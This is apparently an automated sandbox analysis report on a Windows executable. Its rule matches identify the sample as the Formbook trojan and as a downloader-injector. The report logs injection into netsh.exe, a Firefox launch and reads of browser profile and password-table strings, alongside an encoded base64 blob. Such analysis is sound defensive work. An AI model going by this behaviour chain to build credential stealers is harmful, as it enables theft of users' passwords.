            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01100CF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01130F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B2F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01152F28
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01184F40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0118EFA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01102FC8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CEE26
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01110E59
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01122E90
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CCE93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CEEDB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011DB16B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0114516C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_010FF172
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0111B1B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011170C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011BF0CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C70E9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CF0E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C132D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_010FD34C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0115739A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011152A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112B2C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112D2F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B12ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C7571
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011AD5B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011D95C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CF43F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01101460
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CF7B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01155630
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C16CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011A5910
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01119950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112B950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0117D800
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011138E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CFB76
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112FB80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01185BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0114DBF9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CFA49
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C7A46
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01183A6C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01155AA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011ADAAC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011B1AA3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011BDAC6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C1D5A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01113D40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011C7D73
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_0112FDC0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01189C32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CFCF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CFF09
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01111F92
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_011CFFB1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_010D3FD5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_010D3FD2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe | Code function: 1_2_01119EB0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038403E6
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0378E3F0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383A352
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038002C0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03820274
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038341A2
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038401AA
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038381CC
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03770100
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0381A118
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03808158
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03812000
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03780770
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037A4750
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0377C7C0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379C6E0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03840591
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03780535
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0382E4F6
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03824420
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03832446
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03836BD7
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383AB40
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0377EA80
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03796962
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0384A9A6
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037829A0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0378A840
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03782840
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037AE8F0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037668B8
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037F4F40
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037A0F30
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037C2F28
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03822F30
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03772FC8
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037FEFA0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383CE93
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03780E59
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383EEDB
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383EE26
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03792E90
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0378AD00
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0377ADE0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0381CD1F
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03798DBF
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03820CB5
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03780C00
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03770CF2
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0376D34C
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383132D
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037C739A
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038212ED
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379D2F0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379B2C0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037852A0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0376F172
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037B516C
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0378B1B0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0384B16B
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0382F0CC
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383F0E0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038370E9
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037870C0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383F7B0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037C5630
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038316CC
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0381D5B0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_038495C3
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03837571
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03771460
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383F43F
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037BDBF9
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037F5BF0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383FB76
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379FB80
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037F3A6C
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03821AA3
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0381DAAC
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0382DAC6
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03837A46
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383FA49
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037C5AA0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03789950
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379B950
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03815910
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037ED800
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037838E0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383FFB1
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383FF09
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03781F92
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03789EB0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03783D40
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0379FDC0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03831D5A
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_03837D73
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_037F9C32
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_0383FCF2
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C111D0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C0C390
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C0C5B0
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C0A62D
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C0A630
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C12D30
            Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4_2_00C29D70
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01145130 appears 58 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 010FB970 appears 262 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01157E54 appears 107 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0117EA12 appears 86 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0118F290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037FF290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0376B970 appears 262 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037B5130 appears 58 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037EEA12 appears 86 times
            Source: yZcecBUXN7.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: yZcecBUXN7.exe, 00000000.00000002.1626357622.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626915170.0000000003A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000000.1623598827.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000011FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.log
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Local\Temp\1-00F23L
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: yZcecBUXN7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4123105715.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.2195893631.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: yZcecBUXN7.exeReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exeVirustotal: Detection: 37%
            Source: unknownProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
